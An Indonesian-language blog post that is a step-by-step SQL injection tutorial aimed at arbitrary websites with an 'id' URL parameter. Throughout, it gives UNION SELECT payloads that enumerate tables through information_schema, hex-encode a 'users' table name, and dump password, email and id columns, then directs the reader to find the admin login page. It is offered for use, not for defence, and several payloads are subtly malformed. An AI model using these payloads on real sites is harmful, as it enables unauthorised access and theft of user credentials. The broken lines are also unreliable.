ok langsung aja tanpa banyak bicara
CARA:
1.misal ketemu http://www.xxx.com/index.php?id=1
maka tambahkan ' di akhir kalimat sehingga menjadi http://www.xxx.com/index.php?id=1'
harus ada pesan/tulisan eror kalau tdk ada cari yg lain
2.mencari jumlah table dengan cara memakai order by contoh
http://www.xxx.com/index.php?id=-1 order by 1--
itu pakai spasi
jika
http://www.xxx.com/index.php?id=-1 order by 1-- tidak ada pesan eror sperti cara 1 maka tambah 1 pada angka terakhir misal
http://www.xxx.com/index.php?id=-1 order by 1-- di rubah jadi
http://www.xxx.com/index.php?id=-1 order by 2--
BEGITU TERUS SAMPAI SETERUSNYA SAMPAI ADA PESAN/TULISAN EROR
KALAU SUDAH KETEMU PADA EROR PERTAMA MISAL
http://www.xxx.com/index.php?id=-1 ORDER BY 9-- (EROR PERTAMA) maka jumlah table ada 8
3.kita sudah menemukan jumlah table yaitu 8 setelah itu kita memakai cara union select
misal http://www.xxx.com/index.php?id=1 di rubah menjadi http://www.xxx.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8--
setelah itu maka akan muncul beberapa angka dan 1 angka ada yg pling besar(SIZE nya).jika huruf paling besar adalah 3 maka:
http://www.xxx.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8-- di rubah menjadi http://www.xxx.com/index.php?id=-1 1,2,3,@@version,5,6,7,8--
maka akan muncul versi SQL nya,jika versinya 5 kita lanjut kalau versinya 4 harus pakai sql blind.
ini untuk versi 5:
http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 information_schema.tables where table_schema=database()
maka akan kluar beberapa tulisan.cari kata kata yg berhubungan dengan admin misalnya ada tulisan "admin" atau "users"
misal hanya ada tulisan "users"
maka buka http://www.swingnote.com/tools/texttohex.php lalu kita convert to hex yaitu kata "users" tdi menjadi kode hex yg hasilnya 7573657273
kita sudah ada kode 7573657273 yg artinya adalah "users"yg kata users itu dapetnya dari http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 information_schema.tables where table_schema=database()
setelah itu kita ubah http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 information_schema.tables where table_schema=database()
- table_name = column_name = group_concat(column_name)
- tables = columns = from information_schema.columns
- table_schema=database() =? table_name=0x(tambahkan kode hex tadi) = table_name=0x7573657273
Contoh: http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 from information_schema.columns where table_name=0x7573657273--
4.nah lalu ada kata kata misal password,email,id dll
kita pakai yg perlu saja.
misal dari
http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 from information_schema.columns where table_name=0x7573657273--
kita rubah
-(table_name) menjadi tulisan yg ada di cara sblumnya misal password,email,id dll TETAPI CARA PEMISAHANYA HARUS MEMAKAI KODE ,0x3a,
misal url kita tdi http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 from information_schema.columns where table_name=0x7573657273--
dirubah menjadi
http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(password,0x3a,email,0x3a,id),7,8 from information_schema.columns where table_name=0x7573657273--
dan kode terakhir kita ubah juga.kita di ataskan kode hexnya adalah "users" maka kita ganti pada url
http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(password,0x3a,email,0x3a,id),7,8 from information_schema.columns where table_name=0x7573657273--
menjadi
http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(password,0x3a,email,0x3a,id),7,8 from users--
SELESAI DEH SEKARANG TINGGAL CARI HALAMAN LOGIN ADMINYA
0 komentar:
Posting Komentar